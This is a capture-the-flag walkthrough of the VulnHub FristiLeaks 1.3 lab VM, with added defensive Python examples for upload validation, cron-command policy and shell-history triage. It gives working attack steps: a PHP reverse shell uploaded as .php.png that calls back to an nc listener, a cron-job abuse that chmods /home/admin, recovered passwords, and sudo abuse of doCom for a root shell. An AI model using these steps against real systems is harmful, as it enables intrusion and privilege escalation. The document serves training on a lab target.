
VulnHub practice: FristiLeaks_1.3

Discovering the target

First, change the virtual machine's MAC address (see: how to change a VM's MAC address in VMware).


Remember to set the VM's network adapter to NAT mode.
Target IP: 192.168.80.21

kali@kali:~$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1 00:50:56:c0:00:08 VMware, Inc.
192.168.80.2 00:50:56:fc:96:a7 VMware, Inc.
192.168.80.21 08:00:27:a5:a6:76 PCS Systemtechnik GmbH
192.168.80.254 00:50:56:e0:3c:3f VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.109 seconds (121.38 hosts/sec). 4 responded

nmap scan

The scan shows that the target has port 80 open, and that robots.txt disallows crawling of three paths: /cola, /sisi and /beer.

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 00:30 EST
Nmap scan report for 192.168.80.21
Host is up (0.00081s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.81 ms 192.168.80.21

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.40 seconds

Visiting each of these paths shows the same single image:
http://192.168.80.21/cola/
http://192.168.80.21/sisi/
http://192.168.80.21/beer/
Extra knowledge:

Use curl to view the HTTP request and response headers in detail:

kali@kali:~$ curl http://192.168.80.21/sisi/ -v
* Trying 192.168.80.21:80...
* TCP_NODELAY set
* Connected to 192.168.80.21 (192.168.80.21) port 80 (#0)
> GET /sisi/ HTTP/1.1
> Host: 192.168.80.21
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 06 Mar 2020 13:42:59 GMT
< Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
< Last-Modified: Wed, 25 Nov 2015 09:11:42 GMT
< ETag: "3225-21-52559d8c3444b"
< Accept-Ranges: bytes
< Content-Length: 33
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
<img src="/images/3037440.jpg"/>
* Closing connection 0

Logging into the system

Directory brute-forcing (it has not turned up for me yet ;)) leads to the site's login page: http://192.168.80.21/fristi/
Looking at the page source, a comment hints that the password for the user eezeepz is hidden in a base64 string.
We decode the base64 string and save it as a PNG image.

kali@kali:~$ echo '<base64 string from the page source>' | base64 -d > evidence-6.png

Opening the image reveals the password: keKkeKKeKKeKkEkkEk
Logging in with the recovered credentials (eezeepz/keKkeKKeKKeKkEkkEk) gets us into the application.

PHP reverse shell

Kali's bundled webshell scripts live in /usr/share/webshells/php; we edit php-reverse-shell.php there, changing the IP to 192.168.80.14 (the address our nc listener runs on) and the port to the listening port (6666).
After uploading the script to the target, requesting http://192.168.80.21/fristi/uploads/php-reverse-shell.php.png (the uploaded file ends in .png but is still executed as PHP) drops us into a shell as the apache user.

kali@kali:/usr/share/webshells/php$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.80.14] from (UNKNOWN) [192.168.80.21] 43835
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
10:19:44 up 1:55, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
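The upload above works because the form only looks at the last extension of the filename. The following Python is an added example (not the VM's own PHP upload handler) that puts that weak check next to a stricter one: every extension in the name is inspected, the file content must carry the signature of the claimed image type, and the stored name is chosen by the server. The sample file contents are constructed.

```python
import secrets

# Constructed example (not the FristiLeaks upload form): an upload validator
# showing why a last-extension check accepts php-reverse-shell.php.png and
# what a stricter check looks like.

IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar"}
# Leading bytes (file signatures) of each allowed image type.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_check(filename):
    """Looks only at the text after the last dot, so *.php.png passes."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in IMAGE_EXTENSIONS


def strict_check(filename, content):
    """Name and content must both say 'image'.

    Every extension in the chain is inspected: with Apache's AddHandler
    mapping for PHP, a file called x.php.png can still be run as PHP, so a
    script extension anywhere in the name is rejected. The content must also
    begin with the signature of the claimed image type.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2 or any(p == "" for p in parts):
        return False
    exts = parts[1:]
    if any(e in SCRIPT_EXTENSIONS for e in exts):
        return False
    claimed = exts[-1]
    if claimed not in IMAGE_EXTENSIONS:
        return False
    return content.startswith(MAGIC[claimed])


def accept_upload(filename, content):
    """Return the server-chosen stored name, or None if rejected.

    The stem is random so the uploader cannot predict the URL, and only the
    validated image extension is kept.
    """
    if not strict_check(filename, content):
        return None
    return f"{secrets.token_hex(8)}.{filename.lower().rsplit('.', 1)[-1]}"


# Constructed sample contents: a PHP file and a minimal PNG header.
PHP_SAMPLE = b"<?php echo 'hello'; ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print(weak_check("php-reverse-shell.php.png"))                 # True
    print(strict_check("php-reverse-shell.php.png", PHP_SAMPLE))   # False
    print(accept_upload("photo.png", PNG_SAMPLE))                  # <random>.png
```

The signature check is not a complete defence on its own (a PHP payload can be appended after a valid image header), which is why the extension chain is checked as well and why uploads should be served from a directory where the web server has script execution disabled.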
sh-4.1$ cd eezeepz
sh-4.1$ ls
MAKEDEV
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
sh-4.1$ cat notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

Change into /tmp and create the file runthis (the cron job runs it every minute); its single line chmods /home/admin to 777 so that eezeepz can read the contents of admin's directory.

sh-4.1$ cat runthis
/home/admin/chmod 777 /home/admin

After the next run, /home/admin has mode 777 and eezeepz can access the contents of admin's directory.

sh-4.1$ ls -l
total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod
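The escalation works because the cron job accepts any line whose binary sits under /usr/bin/ or /home/admin/, including chmod with admin's own home as the argument. The Python below is an added example, not the VM's cronjob.py (which the page does not reproduce): the weak policy is a reconstruction of what Jerry's note describes, and the strict policy next to it is what a defender would want instead. The sample runthis contents are constructed.

```python
import shlex

# Constructed example: two policies for a "run these lines as admin every
# minute" job. weak_is_allowed mirrors Jerry's note; strict_is_allowed is a
# hardened alternative.

ALLOWED_PREFIXES = ("/usr/bin/", "/home/admin/")


def weak_is_allowed(line):
    """Prefix check only: any binary under the two directories, any args.

    '/home/admin/chmod 777 /home/admin' passes, which is exactly the line
    used above to open admin's home directory.
    """
    try:
        argv = shlex.split(line)
    except ValueError:
        return False
    return bool(argv) and argv[0].startswith(ALLOWED_PREFIXES)


# Strict policy: an exact allow-list of binaries (no chmod/chown), and no
# arguments that point at the privileged user's files or system config,
# or that use '..' to walk out of where they appear to point.
ALLOWED_BINARIES = {
    "/usr/bin/uptime",
    "/usr/bin/free",
    "/home/admin/df",
    "/home/admin/cat",
    "/home/admin/grep",
    "/home/admin/egrep",
    "/home/admin/ps",
    "/home/admin/echo",
}
FORBIDDEN_ARG_PREFIXES = ("/home/admin", "/root", "/etc", "/var/spool/cron")


def strict_is_allowed(line):
    try:
        argv = shlex.split(line)
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return False
    for arg in argv[1:]:
        if ".." in arg or arg.startswith(FORBIDDEN_ARG_PREFIXES):
            return False
    return True


def filter_runthis(text, policy):
    """Split the contents of a runthis file into (accepted, rejected)."""
    accepted, rejected = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        (accepted if policy(line) else rejected).append(line)
    return accepted, rejected


# Constructed sample runthis: a harmless check, the escalation line, and a
# read of admin's ciphertext file.
SAMPLE_RUNTHIS = """/home/admin/df -h /tmp
/home/admin/chmod 777 /home/admin
/home/admin/cat /home/admin/cryptedpass.txt
"""

if __name__ == "__main__":
    print(filter_runthis(SAMPLE_RUNTHIS, weak_is_allowed))
    print(filter_runthis(SAMPLE_RUNTHIS, strict_is_allowed))
```

Even the strict policy is a patch on a bad design: executing lines from a world-writable file in /tmp under another account is the real problem, and the better fix is to offer a fixed menu of checks rather than free-form commands.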

Change into the admin directory; it contains the following:

sh-4.1$ cd admin
sh-4.1$ ls
cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

The key files are cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt. The two txt files hold ciphertext, and the py file implements the encryption scheme.
From that py file we work out the inverse and write a decryption script:

kali@kali:~$ cat decryptpass.py
#!/usr/bin/python3
# Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM
import base64, codecs, sys

def decodeString(s):
    # Undo cryptpass.py in reverse order: un-reverse, rot13 back, then base64-decode
    decoded = codecs.decode(s[::-1], 'rot13')
    return base64.b64decode(decoded)

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult.decode())

Decryption result: the fristigod password (LetThereBeFristi!, used below).
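To see why the decryption above is just the three steps run backwards, here is the forward transform as implied by the decrypt script together with its inverse. This is an added example, not cryptpass.py from the VM (the page does not reproduce that file), so the encrypt function is a reconstruction; the sample strings are constructed.

```python
import base64
import codecs

# Added example: forward transform reconstructed from the decrypt script
# (base64 -> rot13 -> reverse) and its inverse, with a round-trip check.


def encrypt(plain):
    """base64-encode, apply rot13, then reverse the string."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64, "rot13")[::-1]


def decrypt(cipher):
    """Undo the steps in reverse order: reverse, rot13 (its own inverse), base64."""
    b64 = codecs.decode(cipher[::-1], "rot13")
    return base64.b64decode(b64).decode()


def round_trips(samples):
    """True if decrypt(encrypt(s)) == s for every sample string."""
    return all(decrypt(encrypt(s)) == s for s in samples)


# rot13 only touches letters; base64's digits, '+', '/' and '=' padding pass
# through untouched, which is why the text is still valid base64 afterwards.
if __name__ == "__main__":
    c = encrypt("abc")
    print(c, decrypt(c))                      # wWJL abc
    print(round_trips(["LetThereBeFristi!", "", "x"]))   # True
```

There is no key anywhere in this scheme: anyone who can read cryptpass.py can reverse every ciphertext, so storing a password this way is no better than storing it in clear. A real password store would use a salted password hash instead.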

Logging in as fristigod and escalating privileges

Switch to the fristigod user with the recovered password:

sh-4.1$ su - fristigod
standard in must be a tty

We cannot switch to fristigod from here; we first need a full (tty) shell.
Extra knowledge:

The difference between sh and bash
/bin/sh behaves like /bin/bash --posix; the difference between sh and bash is essentially whether bash's POSIX mode is enabled.

sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su - fristigod
Password: LetThereBeFristi!
-bash-4.1$ whoami
fristigod

After logging in as fristigod, look at the command history:

-bash-4.1$ pwd
/var/fristigod
-bash-4.1$ ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
-bash-4.1$ cat .bash_history

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

The history shows fristigod repeatedly running sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom, which looks like a route to root.
Let's try it ourselves: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id, and indeed it runs as root:

-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
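Reading a history file for this pattern is something a defender can automate. The Python below is an added example (not part of the write-up) that triages shell history lines for privilege-escalation indicators: sudo pointed at a binary outside the system bin directories, sudo run as a user other than root, and account-management commands. The sample history is constructed from the .bash_history lines shown above.

```python
import shlex
from collections import Counter

# Added example: triage of a shell history for privilege-escalation
# indicators. SAMPLE_HISTORY is constructed from the lines shown above.

SAMPLE_HISTORY = """ls
pwd
sudo ls
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo /var/fristigod/.secret_admin_stuff/doCom
usermod -G fristigod fristi
less /var/log/secure
exit
"""

SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")
ACCOUNT_TOOLS = {"usermod", "useradd", "userdel", "passwd", "visudo"}


def parse_sudo(argv):
    """Return (run_as_user, command) for a sudo invocation, else None.

    Only '-u USER' is interpreted; other single options are skipped.
    """
    if not argv or argv[0] != "sudo":
        return None
    run_as, i = "root", 1
    while i < len(argv) and argv[i].startswith("-"):
        if argv[i] == "-u" and i + 1 < len(argv):
            run_as, i = argv[i + 1], i + 2
        else:
            i += 1
    cmd = argv[i] if i < len(argv) else ""
    return run_as, cmd


def triage_history(text):
    """Return [(line_no, tags, line)] for lines worth a second look."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:
            continue
        if not argv:
            continue
        tags = []
        parsed = parse_sudo(argv)
        if parsed:
            run_as, cmd = parsed
            # A sudo target given by path but outside the system bin dirs
            # (a home dir, /var, /tmp or ./relative) is the classic
            # "custom privileged helper" pattern seen on this box.
            if "/" in cmd and not cmd.startswith(SYSTEM_DIRS):
                tags.append("sudo-unusual-binary")
            if run_as != "root":
                tags.append("sudo-run-as-other-user")
        elif argv[0] in ACCOUNT_TOOLS:
            tags.append("account-change")
        if tags:
            findings.append((n, tags, line))
    return findings


def summarize(findings):
    """Count how often each tag appears across the findings."""
    return Counter(tag for _, tags, _ in findings for tag in tags)


if __name__ == "__main__":
    for n, tags, line in triage_history(SAMPLE_HISTORY):
        print(f"{n:3d} {','.join(tags):45s} {line}")
    print(dict(summarize(triage_history(SAMPLE_HISTORY))))
```

On a real host the flagged lines are only the starting point: cross-check them against the sudoers configuration and the ownership and mode bits of the binary involved, since a helper that ends up as root regardless of the -u target is exactly what the id output above demonstrates.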

With that we get a root shell and the flag: Y0u_kn0w_y0u_l0ve_fr1st1

-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# cd /root
bash-4.1# ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


bash-4.1# whoami

root

Summary

The main lesson is exploiting a file upload to plant a PHP reverse shell (the webshell script bundled with Kali).
python -c 'import pty;pty.spawn("/bin/bash")' upgrades a limited shell to a full one.
The command history reveals the privilege-escalation route.

Reference

https://kongwenbin.wordpress.com/2017/12/31/write-up-for-fristileaks-v1-3-vulnhub/
